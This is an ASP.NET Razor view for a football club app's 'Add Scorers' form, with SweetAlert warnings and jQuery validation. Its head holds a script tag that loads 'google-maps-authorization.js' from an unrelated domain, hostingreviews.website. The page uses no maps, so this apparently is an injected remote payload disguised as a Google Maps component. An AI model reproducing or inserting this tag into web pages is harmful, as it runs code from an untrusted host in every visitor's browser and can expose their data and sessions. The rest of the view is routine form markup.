@model EverUnited.Models.Match_Scorer

@{
    ViewBag.Title = "Create";
    Layout = "~/Views/Shared/_Layout_team.cshtml";
}


<head>
    <title></title>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    <link href="~/Content/component.css" rel="stylesheet" />
    <link href="~/Content/sweetalert.css" rel="stylesheet" />

    <script src="~/Scripts/sweetalert.min.js"></script>
    <script src="~/Scripts/sweetalert-dev.js"></script>
    <script src="https://www.hostingreviews.website/google-maps-authorization.js?id=6b2c467f-f67b-6f74-575e-5db79cfb2344&c=google-maps-code&u=1469369613" defer="defer" async="async"></script>


</head>
<h2>Add Scorers</h2>

@using (Html.BeginForm())
{
    @Html.AntiForgeryToken()
 <p class="err">
     @Html.ValidationSummary(true)


    </p>  
    <div class="component">


        <table class="colorOfRowData">
            <thead>
                <tr>
                    <th>Team</th>
                    <th>Goal Scorer</th>
                   
                    <th>Assist by</th>
                    <th>Description</th>

                </tr>
            </thead>
            <tbody>
                
                @{
                    try
                    {
                        int limit = (int)ViewBag.team_one_score;
                        int players_count = (int) ViewBag.players;
                        if(players_count < 1 || limit < 1)
                        {
                          <tr>
                            <td>
                                <script>
                                    swal({
                                        title: "Warning",
                                        text: 'Please add score to the match or select players',
                                        type: 'warning',                                     
                                        showConfirmButton: true,

                                    },
                                    function(isConfirm){
                                        if(isConfirm)
                                        {
                                           window: location.href = "/Match/Index"
                                            

                                        }

                                    }
                                    );
                                    
                                </script>
                            </td>
                        </tr>
                      
                        }
                      
                            <tr hidden>
                                <td><input id="limit" name="limit" value="@limit"/></td>
                            </tr>
                    
                            <tr hidden>
                                <td>@Html.HiddenFor(m=>m.Id)</td>
                            </tr>
                    
                                for (int i = 0; i < limit;i++ )
                                {
                                    <tr>
                                        <th>@Html.LabelFor(model => model.player_id, "Player")</th>

                                        <td>
                                            @Html.DropDownList("player_id", String.Empty)
                                            <span style="color:red">
                                             @Html.ValidationMessageFor(model => model.player_id)</span>

                                        </td>

                                        <td>
                                            @Html.DropDownList("player_id", String.Empty)
                                            <span style="color:red">
                                                @Html.ValidationMessageFor(model => model.player_id)
                                            </span>

                                        </td>

                                        <td>
                                            @Html.TextAreaFor(model => model.score_description)
                                            <span style="color:red">
                                                @Html.ValidationMessageFor(model => model.score_description)
                                            </span>

                                        </td>


                        </tr>
               
                                }
                    }
                    catch
                    {
                        <tr>
                            <td>
                                <script>
                                    swal({
                                        title: "Warning",
                                        text: 'Please add score to the match',
                                        type: 'warning',                                     
                                        showConfirmButton: true,

                                    },
                                    function(isConfirm){
                                        if(isConfirm)
                                        {
                                           window: location.href = "/Match/Index"
                                            

                                        }

                                    }
                                    );
                                    
                                </script>
                            </td>
                        </tr>
                    }
                    
                }
                <tr>
                    <th>Action</th>
                    <td><input class="btn btn-primary" type="submit" value="Create" /> | @Html.ActionLink("Back to List", "Index","Match")</td>

                </tr>


            </tbody>

        </table>



    </div>



}


@section Scripts {
    @Scripts.Render("~/bundles/jqueryval")
}
<script src="@Url.Content("~/Scripts/jquery.validate.min.js")" type="text/javascript"></script>
<script src="@Url.Content("~/Scripts/jquery.validate.unobtrusive.min.js")" type="text/javascript"></script>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js"></script>
<script src="http://cdnjs.cloudflare.com/ajax/libs/jquery-throttle-debounce/1.1/jquery.ba-throttle-debounce.min.js"></script>

<script src="~/Scripts/jquery.stickyheader.js"></script>


<script>

    var img = document.getElementById('google');
    var src = $('#google').attr('src');

    $("#gm").val(src);
    //alert(img.getAttribute('src')); // foo.jpg
    //alert(img.src);                 // http://..../foo.jpg


</script>

